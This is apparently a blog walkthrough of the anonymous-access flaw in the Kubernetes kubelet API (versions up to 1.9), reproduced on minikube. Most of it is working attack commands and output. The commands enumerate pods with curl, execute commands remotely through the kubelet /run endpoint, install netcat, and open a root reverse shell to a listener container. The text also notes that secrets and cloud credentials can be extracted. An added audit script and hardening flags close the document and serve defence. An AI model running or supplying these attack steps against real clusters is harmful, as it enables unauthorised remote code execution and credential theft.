By default, the kubelet API allows anonymous access: no keys, no password, nothing is needed.
This is what you are going to need to reproduce this:
1) A Kubernetes cluster running version <= 1.9; this has been fixed in version 1.10: https://github.com/kubernetes/kubernetes/pull/59666
2) The kubelet API ports, 10250 and 10255, exposed to the internet or to your local network.
3) RBAC rules misconfigured or not present at all.
4) A cluster to test on; I recommend installing minikube.
5) A container that is not read-only, so you can install things in it. Even if it is read-only, you can still get a lot of information from it, such as secrets and AWS IAM credentials.
So, let's do this. I did this on minikube just to play and prove the concept; that's the easiest way to play with this vulnerability. Go ahead and install minikube, or run this on your own cluster.
Once you have minikube installed, you need its IP address. Get it with:
angelo:~$ minikube ip
Mine is 192.168.99.100; yours might be different. In order to run the curl commands below, you are going to need the pod name and the pod id.
So let's launch two pods: one as the vulnerable host and the other waiting for our reverse shell.
1) Launch the evil container that will be listening for our reverse shell.
angelo:~$ kubectl run evil --image=centos -it -- /bin/bash
2) Launch the hacked container that we will break into.
angelo:~$ kubectl run hacked --image=centos -it -- /bin/bash
The pod name is "hacked", and you can get the pod id with:
angelo:~$ kubectl get pods
NAME                      READY   STATUS    RESTARTS   AGE
hacked-65d6998b6c-rgl28   1/1     Running   1          48m
evil-7d7fff7d4c-5lmfz     1/1     Running   1          1
So in my case, the pod name is "hacked" and the pod id is "hacked-65d6998b6c-rgl28".
If you are wondering how you would get this information from outside, this is how:
angelo:~$ curl --insecure \
https://kube-node-here:10250/pods | jq
In my case, kube-node-here would be 192.168.99.100 because that's my minikube IP; in a real scenario it would be the IP of the master node. This is how to get the pod names:
angelo:~$ curl -s --insecure \
https://192.168.99.100:10250/runningpods/ | jq .items[].spec.containers[].name
"mongodb"
"external-evil-host"
"hacked"
"sidecar"
"dnsmasq"
"kubedns"
"kubernetes-dashboard"
"storage-provisioner"
"kube-addon-manager"
And this is how to get the pod ids:
angelo:~$ curl -s --insecure \
https://192.168.99.100:10250/runningpods/ | jq .items[].metadata.name
"mongodb-68cbf975f7-45kjh"
"external-evil-host-78d68f7789-2dmvw"
"hacked-6565c4954f-wdj4x"
"kube-dns-54cccfbdf8-dvtcm"
"kubernetes-dashboard-77d8b98585-mtpp9"
"storage-provisioner"
"kube-addon-manager-k8sdemo"
From the commands above you can get the pod id and name. Now let's get into the interesting part.
Open 3 tabs on your terminal: one with a shell on the hacked container, one on the evil container, and another where you are going to run lots of curl commands.
The first thing to do is to create a file as a test. Run this on your localhost:
angelo:~$ curl -sk \
https://192.168.99.100:10250/run/default/hacked-6565c4954f-wdj4x/hacked \
-d "cmd=touch /hello_world"
Now go to your hacked container shell and check whether the file hello_world was created:
angelo:~$ kubectl exec -ti hacked-65d6998b6c-rgl28 -- /bin/bash
[root@hacked-65d6998b6c-rgl28 /]#
[root@hacked-65d6998b6c-rgl28 /]# ls -la /hello_world
-rw-r--r-- 1 root root 0 Mar 22 16:22 /hello_world
Alright, now that we know everything is working, let's install nc on the hacked box so we can launch a reverse shell:
1) Install nc in case it's not there yet.
angelo:~$ curl -sk \
https://192.168.99.100:10250/run/default/hacked-6565c4954f-wdj4x/hacked \
-d "cmd=yum install -y nc"
Loaded plugins: fastestmirror, ovl
Loading mirror speeds from cached hostfile
* base: mirror.freethought-internet.co.uk
* extras: mirrors.coreix.net
* updates: mirrors.coreix.net
Resolving Dependencies
--> Running transaction check
---> Package nmap-ncat.x86_64 2:6.40-7.el7 will be installed
--> Finished Dependency Resolution
Dependencies Resolved
========================================================================
Package Arch Version Repository Size
========================================================================
Installing:
nmap-ncat x86_64 2:6.40-7.el7 base 201 k
Transaction Summary
========================================================================
Install 1 Package
Total download size: 201 k
Installed size: 414 k
Downloading packages:
Running transaction check
Running transaction test
Transaction test succeeded
Running transaction
Installing : 2:nmap-ncat-6.40-7.el7.x86_64 1/1
Verifying : 2:nmap-ncat-6.40-7.el7.x86_64 1/1
Installed:
nmap-ncat.x86_64 2:6.40-7.el7
Complete!
2) Do the same for the evil container (execute this inside the evil container's shell):
[root@evil-ccb5dd4fc-tqf9s /]# yum install -y nc net-tools
Loaded plugins: fastestmirror, ovl
base | 3.6 kB 00:00:00
extras | 3.4 kB 00:00:00
updates | 3.4 kB 00:00:00
(1/4): extras/7/x86_64/primary_db | 185 kB 00:00:00
(2/4): base/7/x86_64/group_gz | 156 kB 00:00:02
(3/4): updates/7/x86_64/primary_db | 6.9 MB 00:00:09
(4/4): base/7/x86_64/primary_db | 5.7 MB 00:00:26
Determining fastest mirrors
* base: mirror.econdc.com
* extras: mirrors.coreix.net
* updates: mirror.econdc.com
Resolving Dependencies
--> Running transaction check
---> Package nmap-ncat.x86_64 2:6.40-7.el7 will be installed
--> Processing Dependency: libpcap.so.1()(64bit) for package: 2:nmap-ncat-6.40-7.el7.x86_64
--> Running transaction check
---> Package libpcap.x86_64 14:1.5.3-9.el7 will be installed
--> Finished Dependency Resolution
Dependencies Resolved
=================================================================================================================================================================
Package Arch Version Repository Size
=================================================================================================================================================================
Installing:
nmap-ncat x86_64 2:6.40-7.el7 base 201 k
Installing for dependencies:
libpcap x86_64 14:1.5.3-9.el7 base 138 k
Transaction Summary
=================================================================================================================================================================
Install 1 Package (+1 Dependent package)
Total download size: 338 k
Installed size: 731 k
Downloading packages:
warning: /var/cache/yum/x86_64/7/base/packages/nmap-ncat-6.40-7.el7.x86_64.rpm: Header V3 RSA/SHA256 Signature, key ID f4a80eb5: NOKEY
Public key for nmap-ncat-6.40-7.el7.x86_64.rpm is not installed
(1/2): nmap-ncat-6.40-7.el7.x86_64.rpm | 201 kB 00:00:00
(2/2): libpcap-1.5.3-9.el7.x86_64.rpm | 138 kB 00:00:04
-----------------------------------------------------------------------------------------------------------------------------------------------------------------
Total 82 kB/s | 338 kB 00:00:04
Retrieving key from file:///etc/pki/rpm-gpg/RPM-GPG-KEY-CentOS-7
Importing GPG key 0xF4A80EB5:
Userid : "CentOS-7 Key (CentOS 7 Official Signing Key) "
Fingerprint: 6341 ab27 53d7 8a78 a7c2 7bb1 24c6 a8a7 f4a8 0eb5
Package : centos-release-7-4.1708.el7.centos.x86_64 (@CentOS)
From : /etc/pki/rpm-gpg/RPM-GPG-KEY-CentOS-7
Running transaction check
Running transaction test
Transaction test succeeded
Running transaction
Installing : 14:libpcap-1.5.3-9.el7.x86_64 1/2
Installing : 2:nmap-ncat-6.40-7.el7.x86_64 2/2
Verifying : 2:nmap-ncat-6.40-7.el7.x86_64 1/2
Verifying : 14:libpcap-1.5.3-9.el7.x86_64 2/2
Installed:
nmap-ncat.x86_64 2:6.40-7.el7
Dependency Installed:
libpcap.x86_64 14:1.5.3-9.el7
Complete!
3) Prepare the reverse shell listener on your evil host. Execute this inside the evil container; you need its IP address so the hacked container can connect back to it:
[root@evil-ccb5dd4fc-tqf9s /]# ifconfig | grep inet | head -n1
inet 172.17.0.4 netmask 255.255.0.0 broadcast 0.0.0.0
[root@external-evil-host-78d68f7789-2dmvw ~]# nc -l -p 6666
4) Now let's run a reverse shell and get shell access to the container:
angelo:~$ curl -sk \
https://192.168.99.100:10250/run/default/hacked-6565c4954f-wdj4x/hacked \
-d "cmd=nc -c /bin/sh 172.17.0.4 6666"
5) Now go to the evil host and you should see the connection from the hacked box:
[root@external-evil-host-78d68f7789-2dmvw ~]# nc -l -p 6666
id
uid=0(root) gid=0(root) groups=0(root)
And that's it, you are inside, game over.
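The quickest way to know whether your own nodes are in the state described above is to ask the kubelet the same unauthenticated question the post starts with and look at the status code it answers with. This is an added audit script, not code from the original post; it assumes curl is installed and that the caller supplies the node address (HOST is hypothetical).

```shell
#!/bin/sh
# Added example (not from the original post): audit whether a kubelet still
# serves its API to anonymous callers. Assumes curl is installed.

# classify RO_STATUS AUTH_STATUS -> verdict string
#   RO_STATUS:   HTTP code from http://HOST:10255/pods  (read-only port, no auth)
#   AUTH_STATUS: HTTP code from https://HOST:10250/pods (authenticated port)
#   "000" means the port did not answer (connection refused / timeout).
classify() {
  ro="$1"; auth="$2"
  if [ "$ro" = "200" ] || [ "$auth" = "200" ]; then
    echo "EXPOSED"          # pod listing served without any credentials
  elif [ "$auth" = "401" ] || [ "$auth" = "403" ]; then
    echo "HARDENED"         # anonymous requests are rejected on 10250
  elif [ "$ro" = "000" ] && [ "$auth" = "000" ]; then
    echo "UNREACHABLE"      # nothing listening, or filtered by the network
  else
    echo "UNKNOWN:$ro/$auth"
  fi
}

# http_code URL -> HTTP status of an unauthenticated GET, "000" on failure
http_code() {
  code=$(curl -sk -o /dev/null --max-time 5 -w '%{http_code}' "$1" 2>/dev/null) || true
  echo "${code:-000}"
}

# kubelet_anon_check HOST -> prints "HOST VERDICT"; exit status 1 when exposed,
# so the function can gate a CI job or a node bootstrap script.
kubelet_anon_check() {
  host="$1"
  ro=$(http_code "http://$host:10255/pods")
  auth=$(http_code "https://$host:10250/pods")
  verdict=$(classify "$ro" "$auth")
  echo "$host $verdict"
  [ "$verdict" != "EXPOSED" ]
}

# Mitigation for an EXPOSED node (kubelet flags; a KubeletConfiguration file
# can set the same values):
#   --anonymous-auth=false --authorization-mode=Webhook --read-only-port=0
# together with the node firewall blocking 10250/10255 from untrusted networks.
```

Run it as `kubelet_anon_check 192.168.99.100` against the minikube IP from the post; a HARDENED verdict means anonymous requests now get 401 or 403 instead of the pod listing.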